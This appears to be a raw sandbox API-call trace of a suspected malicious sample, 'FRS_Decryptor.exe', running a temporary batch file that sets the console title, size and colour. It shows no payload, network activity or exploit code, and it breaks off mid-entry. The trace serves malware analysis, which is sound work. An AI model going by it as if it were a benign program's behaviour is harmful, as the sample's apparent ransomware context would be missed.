[0068.469] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0068.469] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0068.469] _wcsicmp (_String1="title", _String2="REN") returned 2 [0068.469] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0068.469] _wcsicmp (_String1="title", _String2="SET") returned 1 [0068.469] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0068.469] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0068.469] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0068.469] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0068.469] _wcsicmp (_String1="title", _String2="MD") returned 7 [0068.469] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0068.469] _wcsicmp (_String1="title", _String2="RD") returned 2 [0068.469] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0068.469] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0068.469] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0068.469] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0068.469] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0068.469] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0068.469] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0068.469] _wcsicmp (_String1="title", _String2="VER") returned -2 [0068.469] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0068.469] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0068.469] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0068.469] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0068.469] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0068.469] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.469] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x10ee9cc | out: TokenHandle=0x10ee9cc*=0x84) returned 0x0 [0068.469] NtQueryInformationToken (in: TokenHandle=0x84, TokenInformationClass=0x12, TokenInformation=0x10ee9a8, TokenInformationLength=0x4, ReturnLength=0x10ee9b4 | out: TokenInformation=0x10ee9a8, ReturnLength=0x10ee9b4) returned 0x0 [0068.469] NtQueryInformationToken (in: TokenHandle=0x84, TokenInformationClass=0x1a, TokenInformation=0x10ee9a8, TokenInformationLength=0x4, ReturnLength=0x10ee9ac | out: TokenInformation=0x10ee9a8, ReturnLength=0x10ee9ac) returned 0x0 [0068.469] NtClose (Handle=0x84) returned 0x0 [0068.469] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x10ee9c8, nSize=0x0, Arguments=0x10ee9c4 | out: lpBuffer="簨łĎ꾎ĩ❈䀀畠ł\x01") returned 0xf [0068.470] SetConsoleTitleW (lpConsoleTitle="Administrator: FRS Decryptor") returned 1 [0068.470] LocalFree (hMem=0x1427c28) returned 0x0 [0068.470] _get_osfhandle (_FileHandle=1) returned 0xc [0068.471] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.471] _get_osfhandle (_FileHandle=1) returned 0xc [0068.471] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.471] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.471] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.471] SetConsoleInputExeNameW () returned 0x1 [0068.471] GetConsoleOutputCP () returned 0x1b5 [0068.471] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.471] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.471] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0068.471] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0068.471] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.471] SetFilePointer (in: hFile=0x84, lDistanceToMove=40, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x28 [0068.472] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.472] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28 [0068.472] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1dcd, lpOverlapped=0x0) returned 1 [0068.472] SetFilePointer (in: hFile=0x84, lDistanceToMove=68, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44 [0068.472] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=28, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="mode con cols=100 lines=30\r\n") returned 28 [0068.472] GetFileType (hFile=0x84) returned 0x1 [0068.472] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.472] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44 [0068.472] _tell (_FileHandle=3) returned 68 [0068.472] _close (_FileHandle=3) returned 0 [0068.472] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0068.472] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0068.472] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0068.472] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0068.472] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0068.472] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0068.472] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0068.472] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0068.472] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0068.472] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0068.472] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0068.472] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0068.472] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0068.472] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0068.472] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0068.472] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0068.472] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0068.472] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0068.472] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0068.473] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0068.473] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0068.473] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0068.473] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0068.473] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0068.473] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0068.473] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0068.473] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0068.473] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0068.473] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0068.473] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0068.473] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0068.473] _wcsicmp (_String1="mode", _String2="START") returned -6 [0068.473] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0068.473] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0068.473] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0068.473] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0068.473] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0068.473] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0068.473] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0068.473] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0068.473] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0068.473] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0068.473] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0068.473] SetErrorMode (uMode=0x0) returned 0x0 [0068.473] SetErrorMode (uMode=0x1) returned 0x0 [0068.479] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1427c30, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.479] SetErrorMode (uMode=0x0) returned 0x1 [0068.479] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.479] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.479] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.479] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.479] GetLastError () returned 0x2 [0068.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.479] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0x14275f8 [0068.480] FindClose (in: hFindFile=0x14275f8 | out: hFindFile=0x14275f8) returned 1 [0068.480] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0x14275f8 [0068.480] FindClose (in: hFindFile=0x14275f8 | out: hFindFile=0x14275f8) returned 1 [0068.480] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0068.480] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0068.480] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.480] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0068.480] SetErrorMode (uMode=0x0) returned 0x0 [0068.480] SetErrorMode (uMode=0x1) returned 0x0 [0068.480] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1428150, lpFilePart=0x10ee74c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10ee74c*="Desktop") returned 0x1c [0068.480] SetErrorMode (uMode=0x0) returned 0x1 [0068.480] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.480] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.480] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.481] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0xffffffff [0068.481] GetLastError () returned 0x2 [0068.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0x1428450 [0068.481] FindClose (in: hFindFile=0x1428450 | out: hFindFile=0x1428450) returned 1 [0068.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x10ee4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10ee4d8) returned 0x1428450 [0068.481] FindClose (in: hFindFile=0x1428450 | out: hFindFile=0x1428450) returned 1 [0068.481] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0068.481] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0068.481] GetConsoleTitleW (in: lpConsoleTitle=0x10ee9d4, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.481] InitializeProcThreadAttributeList (in: lpAttributeList=0x10ee900, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x10ee8e4 | out: lpAttributeList=0x10ee900, lpSize=0x10ee8e4) returned 1 [0068.481] UpdateProcThreadAttribute (in: lpAttributeList=0x10ee900, dwFlags=0x0, Attribute=0x60001, lpValue=0x10ee8ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x10ee900, lpPreviousValue=0x0) returned 1 [0068.482] GetStartupInfoW (in: lpStartupInfo=0x10ee938 | out: lpStartupInfo=0x10ee938*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0068.482] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0068.482] lstrcmpW (lpString1="\\mode.com", lpString2="\\XCOPY.EXE") returned -1 [0068.484] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cols=100 lines=30", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x10ee888*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cols=100 lines=30", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x10ee8d4 | out: lpCommandLine="mode con cols=100 lines=30", lpProcessInformation=0x10ee8d4*(hProcess=0x88, hThread=0x80, dwProcessId=0x53c, dwThreadId=0x750)) returned 1 [0068.586] CloseHandle (hObject=0x80) returned 1 [0068.586] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0068.586] GetEnvironmentStringsW () returned 0x1424398* [0068.586] FreeEnvironmentStringsA (penv="=") returned 1 [0068.586] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0xffffffff) returned 0x0 [0068.688] GetExitCodeProcess (in: hProcess=0x88, lpExitCode=0x10ee86c | out: lpExitCode=0x10ee86c*=0x0) returned 1 [0068.689] CloseHandle (hObject=0x88) returned 1 [0068.689] _vsnwprintf (in: _Buffer=0x10ee954, _BufferCount=0x13, _Format="%08X", _ArgList=0x10ee874 | out: _Buffer="00000000") returned 8 [0068.689] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0068.689] GetEnvironmentStringsW () returned 0x1424398* [0068.689] FreeEnvironmentStringsA (penv="=") returned 1 [0068.689] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0068.689] GetEnvironmentStringsW () returned 0x1424398* [0068.689] FreeEnvironmentStringsA (penv="=") returned 1 [0068.689] DeleteProcThreadAttributeList (in: lpAttributeList=0x10ee900 | out: lpAttributeList=0x10ee900) [0068.689] _get_osfhandle (_FileHandle=1) returned 0xc [0068.689] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.690] _get_osfhandle (_FileHandle=1) returned 0xc [0068.690] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.690] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.690] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.690] SetConsoleInputExeNameW () returned 0x1 [0068.690] GetConsoleOutputCP () returned 0x1b5 [0068.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.691] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0068.691] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0068.691] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.691] SetFilePointer (in: hFile=0x88, lDistanceToMove=68, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44 [0068.692] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.692] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44 [0068.692] ReadFile (in: hFile=0x88, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1db1, lpOverlapped=0x0) returned 1 [0068.692] SetFilePointer (in: hFile=0x88, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0068.695] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=10, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="color 1f\r\nols=100 lines=30\r\n") returned 10 [0068.695] GetFileType (hFile=0x88) returned 0x1 [0068.695] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.695] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0068.695] _tell (_FileHandle=3) returned 78 [0068.695] _close (_FileHandle=3) returned 0 [0068.695] _wcsicmp (_String1="color", _String2="DIR") returned -1 [0068.695] _wcsicmp (_String1="color", _String2="ERASE") returned -2 [0068.695] _wcsicmp (_String1="color", _String2="DEL") returned -1 [0068.695] _wcsicmp (_String1="color", _String2="TYPE") returned -17 [0068.695] _wcsicmp (_String1="color", _String2="COPY") returned -4 [0068.695] _wcsicmp (_String1="color", _String2="CD") returned 11 [0068.695] _wcsicmp (_String1="color", _String2="CHDIR") returned 7 [0068.695] _wcsicmp (_String1="color", _String2="RENAME") returned -15 [0068.696] _wcsicmp (_String1="color", _String2="REN") returned -15 [0068.696] _wcsicmp (_String1="color", _String2="ECHO") returned -2 [0068.696] _wcsicmp (_String1="color", _String2="SET") returned -16 [0068.696] _wcsicmp (_String1="color", _String2="PAUSE") returned -13 [0068.696] _wcsicmp (_String1="color", _String2="DATE") returned -1 [0068.696] _wcsicmp (_String1="color", _String2="TIME") returned -17 [0068.696] _wcsicmp (_String1="color", _String2="PROMPT") returned -13 [0068.696] _wcsicmp (_String1="color", _String2="MD") returned -10 [0068.696] _wcsicmp (_String1="color", _String2="MKDIR") returned -10 [0068.696] _wcsicmp (_String1="color", _String2="RD") returned -15 [0068.696] _wcsicmp (_String1="color", _String2="RMDIR") returned -15 [0068.696] _wcsicmp (_String1="color", _String2="PATH") returned -13 [0068.696] _wcsicmp (_String1="color", _String2="GOTO") returned -4 [0068.696] _wcsicmp (_String1="color", _String2="SHIFT") returned -16 [0068.696] _wcsicmp (_String1="color", _String2="CLS") returned 3 [0068.696] _wcsicmp (_String1="color", _String2="CALL") returned 14 [0068.696] _wcsicmp (_String1="color", _String2="VERIFY") returned -19 [0068.696] _wcsicmp (_String1="color", _String2="VER") returned -19 [0068.696] _wcsicmp (_String1="color", _String2="VOL") returned -19 [0068.696] _wcsicmp (_String1="color", _String2="EXIT") returned -2 [0068.696] _wcsicmp (_String1="color", _String2="SETLOCAL") returned -16 [0068.696] _wcsicmp (_String1="color", _String2="ENDLOCAL") returned -2 [0068.696] _wcsicmp (_String1="color", _String2="TITLE") returned -17 [0068.696] _wcsicmp (_String1="color", _String2="START") returned -16 [0068.696] _wcsicmp (_String1="color", _String2="DPATH") returned -1 [0068.696] _wcsicmp (_String1="color", _String2="KEYS") returned -8 [0068.696] _wcsicmp (_String1="color", _String2="MOVE") returned -10 [0068.696] _wcsicmp (_String1="color", _String2="PUSHD") returned -13 [0068.696] _wcsicmp (_String1="color", _String2="POPD") returned -13 [0068.696] _wcsicmp (_String1="color", _String2="ASSOC") returned 2 [0068.696] _wcsicmp (_String1="color", _String2="FTYPE") returned -3 [0068.696] _wcsicmp (_String1="color", _String2="BREAK") returned 1 [0068.696] _wcsicmp (_String1="color", _String2="COLOR") returned 0 [0068.696] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.697] _wcsnicmp (_String1="1f", _String2="on", _MaxCount=0x2) returned -62 [0068.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x10eebe4 | out: lpConsoleScreenBufferInfo=0x10eebe4) returned 1 [0068.697] FillConsoleOutputAttribute (in: hConsoleOutput=0xc, wAttribute=0x1f, nLength=0xbb8, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x10eebdc | out: lpNumberOfAttrsWritten=0x10eebdc) returned 1 [0068.698] SetConsoleTextAttribute (hConsoleOutput=0xc, wAttributes=0x1f) returned 1 [0068.698] _get_osfhandle (_FileHandle=1) returned 0xc [0068.698] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.699] _get_osfhandle (_FileHandle=1) returned 0xc [0068.699] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.699] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.699] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.700] SetConsoleInputExeNameW () returned 0x1 [0068.700] GetConsoleOutputCP () returned 0x1b5 [0068.700] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.700] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.700] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0068.700] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0068.701] _get_osfhandle (_FileHandle=3) returned 0x88 [0068.701] SetFilePointer (in: hFile=0x88, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 